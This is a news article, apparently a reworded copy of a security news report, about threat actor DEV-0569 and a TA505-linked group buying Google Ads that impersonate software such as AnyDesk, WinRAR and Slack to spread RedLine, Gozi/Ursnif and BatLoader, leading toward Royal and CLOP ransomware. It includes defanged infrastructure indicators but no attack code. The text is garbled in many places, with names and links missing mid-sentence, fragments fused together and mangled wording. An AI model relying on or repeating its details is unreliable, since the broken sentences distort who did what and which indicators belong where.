Google Ads are used by ransomware access brokers to infringe your network.

DEV-0569 is a threat actor who uses Google Ads to spread malware, steal victim’s passwords and then breach networks in order to launch ransomware attacks.

The past few weeks have seen cybersecurity experts and demonstrate how Google search results are now a hotbed for malicious ads pushing malware .

These advertisements pretend to be sites for popular programs like LightShot and Rufus, FileZilla. LibreOffice. AnyDesk. Awesome Miner. TradingView. WinRAR.

Clicking the ads will take you to download portals and replicas of legitimate software sites.

Typically, however, clicking on the links to download a MSI file installs malware according to the campaign.

RedLine Stealer and Gozi/Ursnif are just a few of the malware that has been found in these campaigns. Vidar and possibly Cobalt Strike have also been installed.

Although there are many threats actors using Google Ads to spread malware, it is worth mentioning two campaigns that were previously linked to ransomware.

Google Ads to Ransomware Attacks

malware distribution campaign that used SEO poisoning in February 2022 to rank websites pretending to have popular software.

A user would download the malware from these sites and then execute BatLoader to launch a multistage infection process. This eventually gives the attackers access to victims’ networks.

Microsoft later reported that threat actors responsible for BatLoader (detailed as DEV0569) had started to advertise their sites using Google Ads. Microsoft claimed that the infections eventually led to the release of onto breached networks.

“Recent Activity from the Threat Actor that Microsoft monitors as DEV0569 has led to deployment of Royal ransomware which was first discovered in September 2022.” .

Research suggests that DEV0569 acts as an initial access broker and uses its malware distribution network to break into corporate networks. This access is sold to malicious actors such as Royal ransomware, or used in their attacks.

Although Microsoft didn’t share any URLs in relation to these attacks with their users, additional reports by , provided more details, which included the URLs that were used in BatLoader campaigns.

bitbucket[. ]org/ganhack123/load/downloads ads-check[. Google Ads Statistics Tracking: ]com

Now, fast forward to January 21, 2023 when CronUp researcher discovered that Google Ads promoting software had led to malware sites using infrastructure controlled by the DEV0569 threat actor.

1/ DEV0569, currently distributed via .

1.- or

2.- (stealer)

If the right conditions exist, it might be possible:

3.- (C2)

4.- Ransomware

(No more BatLoader in the infection chain)

— German Fernandez (@1ZRR4H)

This campaign, unlike previous Microsoft campaigns, does not use BatLoader. Instead, it installs an information-stealer (RedLine Stealer), and then a malware downloadinger (Gozi/Ursnif).

RedLine was used in the current campaign to steal passwords and cookies. Gozi/Ursnif, on the other hand, is used for further malware downloads.

Fernandez stated to BleepingComputer that he had linked the new campaigns with DEV-0569 because they used the same bitbucket repository as the ads-check[.]. The URL of ]com was used in two campaigns that were reported to have been launched November/December 2022.

Fernandez didn’t wait for Royal Ransomware and Cobalt Strike to be installed. He told BleepingComputer, however that he believes the hackers will eventually use the Gozi virus to drop Cobalt Strike like BatLoader in past campaigns.

Fernandez also accessed DEV0569’s Web Panel to monitor their malware distribution campaign. Also, shared screenshots via Twitter. These screenshots displayed the impersonation of legitimate programs and the many victims around the world who were infected every day.

He said that it wasn’t possible to determine how many were affected by the campaign, as the statistics from the internet panel did not allow for an estimate.

Fernandez stated that panel data is cleaned every day. However, there was one data point that might give an indication. It is the correlative identification of records. (It could provide an estimate value for victims, as in our case, 63576).” Fernandez shared this information with BleepingComputer.

CLOP ransomware is also linked to another campaign

The worst part is that a similar but different Google Ads campaign using infrastructure previously owned by threat group TA505, .

The threat actors distributed malware via websites pretending that they are popular software such as AnyDesk and Slack.

This contains a list of domains that were part this campaign.

Once the malware is downloaded, the PowerShell script will execute a PowerShell command that downloads and executes DLLs from download-cdn[. TA505 had previously downloaded a DLL from download-cdn[.

BleepingComputer was informed by Tommy Madjar , proofpoint threat researcher , that the domain has changed owners in the past and is not currently being used by TA505.

No matter who the domain owner is, there are a lot of Google Ads that can be malicious and it’s causing problems for consumers as well as businesses.

These campaigns can be used to get initial access to corporate network networks and lead to various types of attacks such as ransomware, data theft and disruption to company operations.

Although BleepingComputer didn’t contact Google about this article, they did reach out to us last week concerning a similar campaign that was distributed via Google Ads.

Google stated at that time that its policies were designed to protect brands from impersonation.

We have strong policies that prohibit ads trying to . These include hiding the identity of advertisers and impersonating brands. Google informed BleepingComputer that it had reviewed and removed the ads.

Google is removing ads that are to Google and they were detected.

Unfortunately, the threat actors keep launching new ads campaigns and sites. It’s a huge game of whack a mole and Google doesn’t seem to be winning.